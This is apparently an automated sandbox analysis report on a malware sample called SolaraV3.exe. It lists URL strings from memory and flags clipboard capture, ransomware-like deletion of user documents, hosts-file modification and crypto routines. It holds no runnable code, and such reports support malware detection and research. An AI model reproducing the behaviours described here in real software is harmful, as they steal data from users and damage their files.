Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772579209.000001FC25648000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1736269912.000001FC25649000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770391926.000001FC25646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B08000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SolaraV3.exe, 00000002.00000002.2042112590.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772579209.000001FC25648000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1736269912.000001FC25649000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770391926.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25337000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25368000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BE8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/
Source: SolaraV3.exe, 00000002.00000003.1707803030.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1700886273.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: SolaraV3.exe, 00000002.00000003.1728427931.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1707803030.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1700886273.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695774309.000001FC252E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1704396289.000001FC25368000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1707803030.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1700886273.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1706894370.000001FC25368000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695774309.000001FC25368000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1697571219.000001FC25368000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC25569000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmp, SolaraV3.exe, 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmp, libssl-1_1.dll.1.dr, libcrypto-1_1.dll.1.dr	String found in binary or memory: https://www.openssl.org/H
Source: SolaraV3.exe, 00000001.00000003.1560780982.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.1.dr	String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: SolaraV3.exe, 00000002.00000002.2037735840.000001FC24A30000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.1.dr	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: SolaraV3.exe, 00000002.00000003.1708990356.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772675599.000001FC252A7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036193521.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038759505.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC25299000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC25569000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: SolaraV3.exe, 00000002.00000003.1772675599.000001FC252A7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039868154.000001FC253B7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036193521.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC25299000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733

Creates a window with clipboard capturing capabilities

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\SolaraV3.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\LSBIHQFDVT.pdf	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\PALRGUCVEH.mp3	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\ZQIXMVQGAH.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\QNCYCDFIJJ.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NEBFQQYWPS.docx	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\SolaraV3.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Too many similar processes found

Source: conhost.exe	Process created: 40
Source: cmd.exe	Process created: 68

System Summary

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EE93A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,

110_2_00007FF74EE93A70

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EEBB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,

110_2_00007FF74EEBB57C

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Detected potential crypto function

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC701000	1_2_00007FF6DC701000
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7208C8	1_2_00007FF6DC7208C8
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7089E0	1_2_00007FF6DC7089E0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC726964	1_2_00007FF6DC726964
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC711D54	1_2_00007FF6DC711D54
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC71E570	1_2_00007FF6DC71E570
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7135A0	1_2_00007FF6DC7135A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC71DEF0	1_2_00007FF6DC71DEF0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC729728	1_2_00007FF6DC729728
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC725E7C	1_2_00007FF6DC725E7C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC719EA0	1_2_00007FF6DC719EA0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC709800	1_2_00007FF6DC709800
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC711740	1_2_00007FF6DC711740
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC711F60	1_2_00007FF6DC711F60
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC718794	1_2_00007FF6DC718794
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7180E4	1_2_00007FF6DC7180E4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC721874	1_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7240AC	1_2_00007FF6DC7240AC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC711944	1_2_00007FF6DC711944
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC712164	1_2_00007FF6DC712164
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7139A4	1_2_00007FF6DC7139A4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70A2DB	1_2_00007FF6DC70A2DB
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC71DA5C	1_2_00007FF6DC71DA5C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC725C00	1_2_00007FF6DC725C00
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC712C10	1_2_00007FF6DC712C10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC723C10	1_2_00007FF6DC723C10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC726418	1_2_00007FF6DC726418
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7208C8	1_2_00007FF6DC7208C8
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC711B50	1_2_00007FF6DC711B50
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC715D30	1_2_00007FF6DC715D30
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70A47B	1_2_00007FF6DC70A47B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70ACAD	1_2_00007FF6DC70ACAD
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC701000	2_2_00007FF6DC701000
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC726964	2_2_00007FF6DC726964
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70A2DB	2_2_00007FF6DC70A2DB
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC711D54	2_2_00007FF6DC711D54
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC71E570	2_2_00007FF6DC71E570
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7135A0	2_2_00007FF6DC7135A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC71DEF0	2_2_00007FF6DC71DEF0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC729728	2_2_00007FF6DC729728
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC725E7C	2_2_00007FF6DC725E7C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC719EA0	2_2_00007FF6DC719EA0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC709800	2_2_00007FF6DC709800
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC711740	2_2_00007FF6DC711740
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC711F60	2_2_00007FF6DC711F60
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC718794	2_2_00007FF6DC718794
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7208C8	2_2_00007FF6DC7208C8
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7180E4	2_2_00007FF6DC7180E4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC721874	2_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7240AC	2_2_00007FF6DC7240AC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7089E0	2_2_00007FF6DC7089E0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC711944	2_2_00007FF6DC711944
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC712164	2_2_00007FF6DC712164
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7139A4	2_2_00007FF6DC7139A4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC71DA5C	2_2_00007FF6DC71DA5C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC725C00	2_2_00007FF6DC725C00
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC712C10	2_2_00007FF6DC712C10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC723C10	2_2_00007FF6DC723C10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC726418	2_2_00007FF6DC726418
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7208C8	2_2_00007FF6DC7208C8
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC711B50	2_2_00007FF6DC711B50
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC715D30	2_2_00007FF6DC715D30
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70A47B	2_2_00007FF6DC70A47B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70ACAD	2_2_00007FF6DC70ACAD
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0BB66EE0	2_2_00007FFB0BB66EE0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811EA6	2_2_00007FFB0B811EA6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815934	2_2_00007FFB0B815934
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814A59	2_2_00007FFB0B814A59
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813B98	2_2_00007FFB0B813B98
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812D79	2_2_00007FFB0B812D79
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815D8A	2_2_00007FFB0B815D8A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81516E	2_2_00007FFB0B81516E
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B948960	2_2_00007FFB0B948960
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816CBC	2_2_00007FFB0B816CBC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816A87	2_2_00007FFB0B816A87
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811F9B	2_2_00007FFB0B811F9B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813FDF	2_2_00007FFB0B813FDF
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81655F	2_2_00007FFB0B81655F
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8121BC	2_2_00007FFB0B8121BC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0BA50E00	2_2_00007FFB0BA50E00
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8160A0	2_2_00007FFB0B8160A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8122ED	2_2_00007FFB0B8122ED
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811140	2_2_00007FFB0B811140
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816F28	2_2_00007FFB0B816F28
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81704A	2_2_00007FFB0B81704A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8C0440	2_2_00007FFB0B8C0440
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82C480	2_2_00007FFB0B82C480
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8172C5	2_2_00007FFB0B8172C5
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815B14	2_2_00007FFB0B815B14
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812C7A	2_2_00007FFB0B812C7A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9B4170	2_2_00007FFB0B9B4170
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814106	2_2_00007FFB0B814106
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815B78	2_2_00007FFB0B815B78
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816C21	2_2_00007FFB0B816C21
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814B5B	2_2_00007FFB0B814B5B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8129D2	2_2_00007FFB0B8129D2
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82C620	2_2_00007FFB0B82C620
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81177B	2_2_00007FFB0B81177B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B94C660	2_2_00007FFB0B94C660
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812144	2_2_00007FFB0B812144
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814638	2_2_00007FFB0B814638
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8125F4	2_2_00007FFB0B8125F4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8169E7	2_2_00007FFB0B8169E7
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B93DC50	2_2_00007FFB0B93DC50
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813602	2_2_00007FFB0B813602
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811D02	2_2_00007FFB0B811D02
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9C99D0	2_2_00007FFB0B9C99D0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813A8A	2_2_00007FFB0B813A8A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8159FC	2_2_00007FFB0B8159FC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814C19	2_2_00007FFB0B814C19
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812FD1	2_2_00007FFB0B812FD1
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8111CC	2_2_00007FFB0B8111CC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812761	2_2_00007FFB0B812761
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8122B1	2_2_00007FFB0B8122B1
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8172AC	2_2_00007FFB0B8172AC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811622	2_2_00007FFB0B811622
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81736A	2_2_00007FFB0B81736A
